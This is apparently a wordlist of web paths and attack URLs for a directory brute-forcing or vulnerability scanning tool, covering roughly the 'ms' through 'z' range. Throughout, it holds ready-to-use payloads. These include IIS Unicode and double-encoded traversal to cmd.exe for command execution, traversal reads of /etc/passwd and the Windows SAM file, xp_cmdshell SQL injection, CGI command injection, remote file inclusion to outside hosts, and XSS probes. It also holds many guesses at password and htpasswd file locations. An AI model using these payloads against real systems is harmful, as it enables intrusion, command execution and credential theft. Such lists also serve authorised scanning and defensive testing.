msadc/..%255c../winnt/system32/cmd.exe?/c+dir
msadc/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir
msadc/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
msadc/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:
msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
msadc/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
msadc/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:
msadc/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir
msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir
msadc/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir
msadc/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/cmd.exe?/c+dir
msadc/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
msadc/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
msadc/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
msadc/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir
msadc/root.exe?/c+dir
msadc/root.exe?/c+dir^/msadc/root.exe?/c+dir;
Ms-admin
mtc/search.cgi
mybbs/saveup{ext}
mydata{ext}
MyFavouriate-back
My-login{ext}
mypasswds/ana-bin/sitehtpass/europemodel.com/htpass-bluebird
mypasswds/ana-bin/sitehtpass/heathersplace.com/htpass-members
mypasswds/cgi-bin/am/codes/htpasswd
mypasswds/cgi-bin/database/passwords
mypasswds/cgi-bin/fratboys/passwords
mypasswds/cgi-bin/ib/data/htpasswd
mypasswds/cgi-bin/mastergate/passwords
mypasswds/cgi-bin/passwords
my-way
na-bin/sitehtpass/heathersplace.com/htpass-members
names.nsf/open
names.nsf/Open
netbilling/ana-bin/sitehtpass/europemodel.com/htpass-bluebird
netbilling/ana-bin/sitehtpass/heathersplace.com/htpass-members
netbilling/cgi-bin/am/codes/htpasswd
netbilling/cgi-bin/database/passwords
netbilling/cgi-bin/fratboys/passwords
netbilling/cgi-bin/ib/data/htpasswd
netbilling/cgi-bin/mastergate/passwords
netbilling/cgi-bin/passwords
new/admin_index{ext}
new{ext}
newbbs/login{ext}
news/admin/upfile{ext}
newscode-news
newspass/ana-bin/sitehtpass/europemodel.com/htpass-bluebird
newspass/ana-bin/sitehtpass/heathersplace.com/htpass-members
newspass/cgi-bin/am/codes/htpasswd
newspass/cgi-bin/database/passwords
newspass/cgi-bin/fratboys/passwords
newspass/cgi-bin/ib/data/htpasswd
newspass/cgi-bin/passwords
newstg-save
nfbm-files
non-cgi
nph-publish
nph-test-cgi
null.htw?CiWebHitsFile=/index.htm&CiRestriction="<SCRIPT>alert(document.domain)</SCRIPT>"
Nwind/Template/catalog.xml?contenttype=text/overvlowhere
obi-wan
office/login{ext}
office/web%5Fadmin
ok_pass{ext}
ok-he
ok-hexlb
omegaslair.com/htpass-bambi
oordir/ana-bin/sitehtpass/europemodel.com/htpass-bluebird
oordir/ana-bin/sitehtpass/heathersplace.com/htpass-members
oordir/cgi-bin/am/codes/htpasswd
oordir/cgi-bin/database/passwords
oordir/cgi-bin/fratboys/passwords
oordir/cgi-bin/ib/data/htpasswd
oordir/cgi-bin/mastergate/passwords
oordir/cgi-bin/passwords
op/cs/cssearch.cgi?command=all&setup=`/bin/ls`
opendir.asp?requesturl=/etc/passwd
opendir.aspx?requesturl=/etc/passwd
opendir.jsp?requesturl=/etc/passwd
opendir.php?requesturl=/etc/hosts
opendir.php?requesturl=/etc/passwd
oprocmgr-service
oprocmgr-status
opt/netscape/suitespot/admin-serv/config/admpw
outer-glow
outlook-like
ows-bin/owa/owa%5futil%2eshowsource
ows-bin/owa/owa%5futil%2esignature
pages&
pages/css/background.cssrel=stylesheettype=text/css
pages/javascript:
pages/pages2/cankao/(null)
pages/pages2/shehui/lishi/javascript:
pages/pages2/yishu/javascript:
pagesfile:/E:/daring
pagesjavascript:
pala-files
pals-cgi
pals-cgi?palsaction=restart&documentname=/bin/id
pals-cgi?palsAction=restart&documentName=pals-cgi
pass/ana-bin/sitehtpass/europemodel.com/htpass-bluebird
pass/ana-bin/sitehtpass/heathersplace.com/htpass-members
pass/cgi-bin/am/codes/htpasswd
pass/cgi-bin/database/passwords
pass/cgi-bin/fratboys/passwords
pass/cgi-bin/ib/data/htpasswd
pass/cgi-bin/passwords
pass?loginpass=a&redirect=0%2F&Submit=Login
passwords/ana-bin/sitehtpass/europemodel.com/htpass-bluebird
passwords/ana-bin/sitehtpass/heathersplace.com/htpass-members
passwords/cgi-bin/am/codes/htpasswd
passwords/cgi-bin/database/passwords
passwords/cgi-bin/fratboys/passwords
passwords/cgi-bin/ib/data/htpasswd
passwords/cgi-bin/passwords
PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:
PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:
PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:^/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:;
PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:
PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:^/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:;
pbserver/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:
PBServer/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
PBServer/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir^/PBServer/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir;
pbserver/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:
PBServer/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir
PBServer/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir;
penit-Admin
pfdisplay.cgi/etc/passwd
phorum/admin/actions/del.php?include_path=http:/phonehomedotcom&cmd=ls
photoads/cgi-bin
php.cgi?/etc/passwd
php/php.exe?c:/winnt/repair/sam
phplib/page.asp?_phplib[libdir]=http:/www.china.com
phplib/page.asp?_phplib[libdir]=http:www.china.com
phplib/page.aspx?_phplib[libdir]=http:/www.china.com
phplib/page.aspx?_phplib[libdir]=http:www.china.com
phplib/page.jsp?_phplib[libdir]=http:/www.china.com
phplib/page.jsp?_phplib[libdir]=http:www.china.com
phplib/page.php?_phplib[libdir]=http:/www.china.com
phplib/page.php?_phplib[libdir]=http:www.china.com
phpmyadmin/sql.asp?btndrop=no&goto=/etc/passwd
phpmyadmin/sql.aspx?btndrop=no&goto=/etc/passwd
phpmyadmin/sql.jsp?btndrop=no&goto=/etc/passwd
phpmyadmin/sql.php?btndrop=no&goto=/etc/passwd
phpMyAdmin/sql.php?goto=/etc/hosts&btnDrop=No
phpMyAdmin/tbl_replace.php?db=test&table=ess&goto=/etc/hosts
phpPhotoAlbum/getalbum.php?album=../../../etc
phprocketaddin/?page=../../../../../../../etc/hosts
phprocketaddin/?page=../../../../etc/passwd
phpRPG-0.8.0/tmp
phptonuke.php?filnavn=/etc/hosts
pic/getpic{ext}
pic/upfile{ext}
pic/uppic{ext}
piccodejs-VIP
pics/ana-bin/sitehtpass/europemodel.com/htpass-bluebird
pics/ana-bin/sitehtpass/heathersplace.com/htpass-members
pics/cgi-bin/am/codes/htpasswd
pics/cgi-bin/database/passwords
pics/cgi-bin/fratboys/passwords
pics/cgi-bin/ib/data/htpasswd
pics/cgi-bin/passwords
picture/getfile{ext}
picture/getpic{ext}
ping?SomeCrapHere
ping-san
play%EF%BC%8C5061%EF%BC%8C10128%EF%BC%8C0
play,5061,10128,0http:/www.gougou.com
play,5061,10128,0http:www.gougou.com
play,6183,12374,19%20%20
play,7
play,791,1587,
pls/admin_/?
Plug-Ins
plugins/squirrelspell/modules/check_me.mod.php?SQSPELL_APP[blah]=wall%20hello&sqspell_use_app=blah&attachment_dir=/tmp&username_sqspell_data=plik
pm_adminysm{ext}
porsjie-1
post_upfile{ext}
post_upload{ext}
prd.i/pgen
private{ext}
Product/manage/login{ext}
products/phpPhotoAlbum/explorer.php?folder=../../../../../../../etc
profile/login{ext}
program{ext}
programming{ext}
programs{ext}
project/webpet/login{ext}
project-admins
prometheus-all/index.php?PROMETHEUS_LIBRARY_BASE=http:/another_/autoload.lib/&PHP_AUTO_LOAD_LIB=0
protected/ana-bin/sitehtpass/europemodel.com/htpass-bluebird
protected/ana-bin/sitehtpass/heathersplace.com/htpass-members
protected/cgi-bin/am/codes/htpasswd
protected/cgi-bin/database/passwords
protected/cgi-bin/fratboys/passwords
protected/cgi-bin/ib/data/htpasswd
protected/cgi-bin/passwords
protectit/ana-bin/sitehtpass/europemodel.com/htpass-bluebird
protectit/ana-bin/sitehtpass/heathersplace.com/htpass-members
protectit/cgi-bin/am/codes/htpasswd
protectit/cgi-bin/database/passwords
protectit/cgi-bin/fratboys/passwords
protectit/cgi-bin/ib/data/htpasswd
protectit/cgi-bin/mastergate/passwords
protectit/cgi-bin/passwords
PSUser/PSCOErrPage.htm?errPagePath=/etc/hosts
pt-br
public{ext}
publisher/|publisher
radmind-1
random_banner/index.cgi?image_list=alternative_image.list&html_file=../../../../../etc/hosts
reg_upload{ext}
reg_upload1{ext}
register{ext}
Related-News
relogin-Admin
resin-doc
restricted/ana-bin/sitehtpass/europemodel.com/htpass-bluebird
restricted/ana-bin/sitehtpass/heathersplace.com/htpass-members
restricted/cgi-bin/am/codes/htpasswd
restricted/cgi-bin/database/passwords
restricted/cgi-bin/fratboys/passwords
restricted/cgi-bin/ib/data/htpasswd
restricted/cgi-bin/mastergate/passwords
restricted/cgi-bin/passwords
root/login{ext}
root{ext}
rounded-white
Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:
Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:
Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:
Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
Rpc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
Rpc/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir
salvjr/.realms/6XQU1zwY
samples/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
samples/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
samples/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
samples/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
samples/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
samples/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
samples/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
samples/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir^/samples/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir;
samples/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
samples/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir
samples/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
samples/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
samples/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
samples/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir
sara-ann
Saveannounce_upload{ext}
saveup{ext}
saveup1{ext}
scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:
scripts/*
scripts/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
scripts/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
scripts/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
scripts/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:
scripts/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:
scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:
scripts/..%255c../winnt/system32/cmd.exe?/c+dir
scripts/..%c0%2f..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir
scripts/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir
scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:
scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir
scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
scripts/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:
scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir
scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:
scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir
scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:
scripts/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir
scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir
scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir
scripts/..%d0%af../winnt/system32/cmd.exe?/c+dir
scripts/..%d0%af../winnt/system32/cmd.exe?/c+dir+c:
scripts/..%d1%9c../winnt/system32/cmd.exe?/c+dir
scripts/..%d1%9c../winnt/system32/cmd.exe?/c+dir+c:
scripts/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/cmd.exe?/c+dir
scripts/..%u0025%u005c../winnt/system32/cmd.exe?/c+dir
scripts/..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir+c:
scripts/..%u00255c../..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
scripts/..%u00255c../winnt/system32/cmd.exe?/c+dir
scripts/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
scripts/..%u002f../..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir
scripts/..%u002f../winnt/system32/cmd.exe?/c+dir
scripts/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
scripts/..%u005c../..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir
scripts/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
scripts/..%u005c../winnt/system32/cmd.exe?/c+dir
scripts/alibaba.pl/|dir
scripts/c32web.exe/changeadminpassword
scripts/c32web.exe/ChangeAdminPassword
scripts/cart32.exe/cart32clientlist
scripts/cart32.exe/cart32clientlist?passwd=wemilo
scripts/ccc.exe?/c+dir
scripts/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c%20dir%20C:
scripts/cmd.exe?/c+dir
scripts/cmd1.exe?+/c+dir
scripts/cmd32.exe?/c+dir
scripts/command.exe?+/c+dir
scripts/cphost.dll?my_file=localthing&TargetURL=/Sites/Publishing/srvname/ldap_anonymous
scripts/cs/cssearch.cgi?command=all&setup=`/bin/ls`
scripts/eeyehack.exe?+/c+dir
scripts/faxsurvey?/bin/cat%20/etc/passwd
scripts/get32.exe/|dir
scripts/hack.exe?/c+dir
scripts/handler/useless_shit;cat/t/etc/passwd|
scripts/i.exe?/c+dir
scripts/iisadmin/bdir.htr?dir=ht??c:
scripts/iisadmin/ism.dll%3fhttp/dir
scripts/iisadmin/ism.dll?dir/bdir+??c:
scripts/iisadmin/ism.dll?http/dir
scripts/iisadmin/ism.dll?http/dir%20../..
scripts/nph-publish
scripts/nph-test-cgi
scripts/perl?
scripts/pfdisplay.cgi?/../../../../etc/passwd
scripts/phf?qalias=x%0a/bin/cat%20/etc/passwd
scripts/phf?qname=root%0acat%20/etc/passwd
scripts/query?mss=../config
scripts/root.exe?/c+dir
scripts/search.cgi?letter=../../../../winnt
scripts/sensepost.exe?+/c+dir
scripts/slxweb.dll/admin
scripts/srx.exe?+/c+dir
scripts/texis.exe/?-dump
scripts/texis.exe/?-version
scripts/texis.exe/ngohos
scripts/tools/ctss.idc?ds=LocalServer&user=sa&pwd=&table=ngt(ng%20int);EXEC+master..xp_cmdshell(""cmd.exe+/c%20dir"");--"
scripts/tools/ctss.idc?ds=LocalServer&user=sa&pwd=&table=ngt(ng%20int);EXEC+master..xp_cmdshell(cmd.exe+/c%20dir);--
scripts/tst.bat/|dir
scripts/view-source
scripts/w3-msql
scripts/websec.bat
scripts/wsisa.dll/WService=anything?WSMadmin
scripts/www-sql
sdf$tv
search%3f
search.dll?search?query=/&logic=and
search.dll?search?query=/&logic=AND
search/results.stm?query=<script>alert('X');</script>
search/search97.vts?HLNavigate=On&querytext=dcm&ServerKey=Primary&ResultTemplate=../../../../../../../etc/hosts&ResultStyle=simple&ResultCount=20&collection=books
search2-ok
secret{ext}
secrets{ext}
secure/ana-bin/sitehtpass/europemodel.com/htpass-bluebird
secure/ana-bin/sitehtpass/heathersplace.com/htpass-members
secure/cgi-bin/am/codes/htpasswd
secure/cgi-bin/database/passwords
secure/cgi-bin/fratboys/passwords
secure/cgi-bin/ib/data/htpasswd
secure/cgi-bin/mastergate/passwords
secure/cgi-bin/passwords
sek-bin/login.gas.bat?Template=../../../../../../../../etc/hosts&LOCALE=en_US&AUTHMETHOD=UserPassword
sendfile{ext}
sendpic{ext}
server%+logfile
server%20logfile
server%20logfile;dunno
server_stats{ext}
Server{ext}
server+logfile
server-info
server-info{ext}
server-scripts
server-status
server-status{ext}
servicesystem/login-admin
servlet/com.newatlanta.servletexec.JSPServlet
servlet/ServletManager?username=servlet&password=manager
session/pagecount?page=
set{ext}
setdiscount-temp
setting{ext}
setup{ext}
sever{ext}
sheila-kathryn
show/back/index{ext}
showboard{ext}
showerr.asp?BoardID=0&ErrCodes=54&action=<script>JavaScript:alert(document.cookie);</script>
ShowPloy-1
ShowUser{ext}
signon?admin=admin&maybe_tivoli
sjh@
skin-bak
sndfile{ext}
snmp{ext}
source?v=../../../../../../../etc/hosts%00
source{ext}
sources{ext}
sql/db_type.php?waroot=http:/anotherhost_start_php
sql{ext}
sql-admin
squirrelspell/modules/check_me.mod.asp?sqspell_app[blah]=wall%20hello&sqspell_use_app=blah&attachment_dir=/tmp&username_sqspell_data=plik
squirrelspell/modules/check_me.mod.aspx?sqspell_app[blah]=wall%20hello&sqspell_use_app=blah&attachment_dir=/tmp&username_sqspell_data=plik
squirrelspell/modules/check_me.mod.jsp?sqspell_app[blah]=wall%20hello&sqspell_use_app=blah&attachment_dir=/tmp&username_sqspell_data=plik
squirrelspell/modules/check_me.mod.php?sqspell_app[blah]=wall%20hello&sqspell_use_app=blah&attachment_dir=/tmp&username_sqspell_data=plik
sr-latn
st-admin
stat{ext}
statistics{ext}
stats/access-stats
stats/ana-bin/sitehtpass/europemodel.com/htpass-bluebird
stats/ana-bin/sitehtpass/heathersplace.com/htpass-members
stats/cgi-bin/am/codes/htpasswd
stats/cgi-bin/database/passwords
stats/cgi-bin/fratboys/passwords
stats/cgi-bin/ib/data/htpasswd
stats/cgi-bin/mastergate/passwords
stats/cgi-bin/passwords
Stats{ext}
stock/login{ext}
stronghold-info
stronghold-status
students-supplies-js
sub-login
suche%3f
super_index{ext}
super_login{ext}
super{ext}
super1{ext}
Super-Admin
superman{ext}
supermanager{ext}
superuser{ext}
supervise/Login{ext}
SWEditServlet?station_path=Z&publication_id=2043&template=../../../../../../../etc/hosts
sxadmin/index{ext}
sys/login{ext}
sys/menu.asp/admin
sys{ext}
sys-admin
sysadmin{ext}
system/login{ext}
system{ext}
system-administration
systems/login{ext}
systems{ext}
syWebEditor/Sel_UploadFile.asp?obj=ProPhoto&fileType=gif|jpg|png|&filePathType=1&filePath=/PhotoFile/ProFile
tacforo/admin_login{ext}
technote/main.cgi/oops
technote/technote/print.cgi?board=../../../../../../../../etc/passwd%00
telephone{ext}
temp_admin{ext}
temp{ext}
templates/default/images/bookmarkv%3E%20%20%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20class=
templates/n%20class=
temporary{ext}
terri-jo
test%2ejsp
test{ext}
test-cgi
texis.exe/?-dump
texis.exe/?-version
tgrnf@12
thu-ji
tianjia-lb
ticket_main-1
ticket_main-2
tmp_view.php?file=/etc/hosts
tool{ext}
tools{ext}
top{ext}
top-2
top-me
toucher/admin_login{ext}
tp-shangchuan
trade/admin/Login{ext}
tst/psoft.hsphere.CP/tst/?template_name=x
tui-web
tzi-dar
u13/salvjr/.realms/6XQU1zwY
unix/ALEX/Xerver2.10
up{ext}
update{ext}
upfile_flash{ext}
upfile_soft{ext}
Upfile_SoftPic{ext}
upfile{ext}
upfile1{ext}
upload.asp?uppath=/fd_upimg
upload/up{ext}
upload/upload{ext}
upload/uppic{ext}
upload_flash{ext}
upload_soft{ext}
upload{ext}
upload{ext}?action=upfile
UploadFace{ext}
uploads{ext}
UploadSoft/diy{ext}
uppic{ext}
uppicture/getpic{ext}
uppicture/up{ext}
uppicture/uppic{ext}
upsoftfile{ext}
ur-admin
ur-admin{ext}
usage{ext}
user/admin{ext}
user/index{ext}
user/login{ext}
user/logout{ext}
user/super{ext}
user_upfile{ext}
user{ext}
user1{ext}
user2{ext}
user3{ext}
user888{ext}
UserJoin{ext}
userlist{ext}
userlook{ext}
UserManage{ext}
UserModify{ext}
user-msg
user-news
USERok{ext}
userreg.cgi?cmd=insert</=eng&tnum=3&fld1=test999%0acat</var/spool/mail/login>>/etc/passwd
userreg.cgi?cmd=insert>/etc/passwd
users{ext}
userslist{ext}
US-na-tzu-js
vi-cn
vi-cndata
viewpage.asp?file=/etc/passwd
viewpage.aspx?file=/etc/passwd
viewpage.jsp?file=/etc/passwd
viewpage.php?file=/etc/hosts
viewpage.php?file=/etc/passwd
view-source
view-source/etc/passwd
wantpws{ext}
web/members/~htpasswd
Web_store/web_store.cgi?page=../../../../../../../../etc/passw
web2000/oor/content_areas/authorize/ana-bin/sitehtpass/europemodel.com/htpass-bluebird
web2000/oor/content_areas/authorize/ana-bin/sitehtpass/heathersplace.com/htpass-members
web2000/oor/content_areas/authorize/cgi-bin/am/codes/htpasswd
web2000/oor/content_areas/authorize/cgi-bin/database/passwords
web2000/oor/content_areas/authorize/cgi-bin/fratboys/passwords
web2000/oor/content_areas/authorize/cgi-bin/ib/data/htpasswd
web2000/oor/content_areas/authorize/cgi-bin/mastergate/passwords
web2000/oor/content_areas/authorize/cgi-bin/passwords
web2000/oor/content_areas/safe/ana-bin/sitehtpass/europemodel.com/htpass-bluebird
web2000/oor/content_areas/safe/ana-bin/sitehtpass/heathersplace.com/htpass-members
web2000/oor/content_areas/safe/cgi-bin/am/codes/htpasswd
web2000/oor/content_areas/safe/cgi-bin/database/passwords
web2000/oor/content_areas/safe/cgi-bin/fratboys/passwords
web2000/oor/content_areas/safe/cgi-bin/ib/data/htpasswd
web2000/oor/content_areas/safe/cgi-bin/passwords
webadmin{ext}
webcart-lite
webcash/ana-bin/sitehtpass/europemodel.com/htpass-bluebird
webcash/ana-bin/sitehtpass/heathersplace.com/htpass-members
webcash/cgi-bin/am/codes/htpasswd
webcash/cgi-bin/database/passwords
webcash/cgi-bin/fratboys/passwords
webcash/cgi-bin/ib/data/htpasswd
webcash/cgi-bin/mastergate/passwords
webcash/cgi-bin/passwords
webdata{ext}
web-inf
WEB-INF
weblog{ext}
weblogs{ext}
webmacro/Page?db=tst&wmtemplate=ttt
web-manager
webmaster{ext}
webMathematica/MSP?MSPStoreID=../../../../../etc/hosts&MSPStoreType=image/gif
website-information
WebSTAR%20LOG
WebSTART%20LOG
webstart+log
webstats{ext}
webyx-100
webyx-1000
webyx-200
webyx-2500
webyx-50
webyx-500
webyx-wx
weihu/login{ext}
wen-mei
wenzhang{ext}
whois_raw.cgi/etc/passwd
wikihome/action/conflict.php?TemplateDir=http:/my.host
win2k-1
win2k-2
wocaonima{ext}
work/ana-bin/sitehtpass/europemodel.com/htpass-bluebird
work/ana-bin/sitehtpass/heathersplace.com/htpass-members
work/cgi-bin/am/codes/htpasswd
work/cgi-bin/database/passwords
work/cgi-bin/fratboys/passwords
work/cgi-bin/ib/data/htpasswd
work/cgi-bin/passwords
work{ext}
wp-admin
'wp-admin
wp-includes
wp-login
wr@1844
wstats{ext}
www.china.com
www{ext}
wwwlog{ext}
www-sql
xiangce-heka
xiugai-lb
xml-rpc
xue-jun
xxxxxxx.....xxxxxxxxx
xxyy/ana-bin/sitehtpass/europemodel.com/htpass-bluebird
xxyy/ana-bin/sitehtpass/heathersplace.com/htpass-members
xxyy/cgi-bin/am/codes/htpasswd
xxyy/cgi-bin/database/passwords
xxyy/cgi-bin/fratboys/passwords
xxyy/cgi-bin/ib/data/htpasswd
xxyy/cgi-bin/mastergate/passwords
xxyy/cgi-bin/passwords
xzy%23ye55
xzy%23ye551
yamamah/?news=1
yonetici{ext}
yonetim{ext}
ytoe-files
yung-hsi
z_shop_newshop{ext}
Z-Blog
zboard/_head.php?_zb_path=http:/thehost.net/a
zdx-files
zdy-shangchuan
zeroboard/_head.php?_zb_path=http:/thehost.net/a
zh-cn
zh-HK
zh-SG
zh-tw
zkcf/login{ext}
zkcf45/login{ext}
zm-89
zzz.asp/admin_delete